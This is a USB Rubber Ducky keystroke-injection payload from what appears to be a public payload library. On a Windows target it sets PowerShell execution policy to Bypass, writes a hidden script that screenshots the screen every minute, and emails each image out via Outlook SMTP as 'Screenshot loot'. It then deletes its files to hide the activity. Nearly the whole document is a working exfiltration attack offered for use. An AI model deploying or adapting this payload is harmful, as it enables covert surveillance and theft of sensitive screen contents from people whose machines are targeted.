Path: blob/master/payloads/library/exfiltration/Ducky_Crab/payload.txt
REM Title: ducky_crab
REM Author: the-jcksn
REM Description: Gives "screen crab" like capabilities to the USB rubber ducky. Creates a powershell script that captures screenshots and exfiltrates them via outlook, once a minute, even after the USB rubber ducky has been removed.
REM Target: Windows
REM Version: 1.0
REM Category: Exfiltration

REM ~~~~ You must change [email protected] and USERPASSWORD to your outlook credentials (line 45)
REM ~~~~ Change the time for the payload to run after ducky is removed (default 10 minutes - line 38)
REM ~~~~ DO NOT REMOVE THE RUBBER DUCKY UNTIL THE PROMPT APPEARS ON SCREEN SAYING TO DO SO, after this, the payload will run without the ducky inserted
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
REM ~~~~ Use responsibly, and within the confines of the law.


REM opening powershell and allowing scripts
DELAY 1000
REM this needs to run first separate from the script (allows scripts to run on target)
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
ENTER
DELAY 200
REM the following line may cause an error on some systems, this can be ignored, on some systems it is REQUIRED, please do not alter this
STRING y
ENTER
DELAY 400
REM create the powershell script
STRING New-Item -Path 'Pictures' -Name 'screens.ps1' -ItemType file
ENTER
DELAY 200
STRING "cd C:\Users\$env:username\ `nNew-Item -Path 'C:\Users\$env:username\Pictures\Screens\' -ItemType Directory" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
REM number of minutes to capture screenshots for - default is 10 (edit the integer to change)
STRING "`$timer = new-timespan -Minutes 10" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
STRING "`$clock = [diagnostics.stopwatch]::StartNew() `nwhile (`$clock.elapsed -lt `$timer){ `n[void][reflection.assembly]::loadwithpartialname('system.windows.forms') `n`$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen `n`$Width = `$Screen.Width `n`$Height = `$Screen.Height `n`$Left = `$Screen.Left `n`$Top = `$Screen.top `n`$bitmap = New-Object System.Drawing.Bitmap `$Width, `$Height `n`$graphic = [System.Drawing.Graphics]::FromImage(`$bitmap) `n`$graphic.CopyFromScreen(`$Left, `$Top, 0, 0, `$bitmap.Size) `n`$enddate = (Get-Date).tostring('ddMMyy-hh_mm_ss') `n`$filename = `$enddate + '.gif' `n`$bitmap.Save('C:\Users\$env:Username\Pictures\Screens\' + `$filename) `nstart-sleep -seconds 10" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
REM change [email protected] (3 times) and USERPASSWORD (once) to your credentials below. DO NOT REMOVE ANY QUOTES OR BACKTICKS
STRING "Send-MailMessage -From [email protected] -To [email protected] -Subject `"Screenshot loot`" -Body `"Please find attached your screenshot update`" -Attachment `"Pictures\Screens\`$filename`" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList [email protected], (ConvertTo-SecureString -String `"USERPASSWORD`" -AsPlainText -Force))" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
STRING "start-sleep -seconds 60 `n} `nSet-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser `nGet-ChildItem Pictures\Screens -Include *.* -Recurse | ForEach {`$_.Delete()} `nRemove-Item Pictures\screens -Confirm:`$false `nRemove-Item Pictures\screens.ps1 -Force `nexit" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
STRING exit
ENTER
DELAY 300
REM run the script we created
GUI r
DELAY 300
STRING powershell -w hidden -File "%USERPROFILE%\Pictures\screens.ps1"
ENTER
DELAY 1000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 300
STRING You may now remove the rubber ducky and close this window. Loot will arrive shortly.
ENTER
ENTER
DELAY 500
STRING Closing this window automatically in:
ENTER
STRING 3...
ENTER
DELAY 600
STRING 2...
DELAY 600
ALT F4
STRING n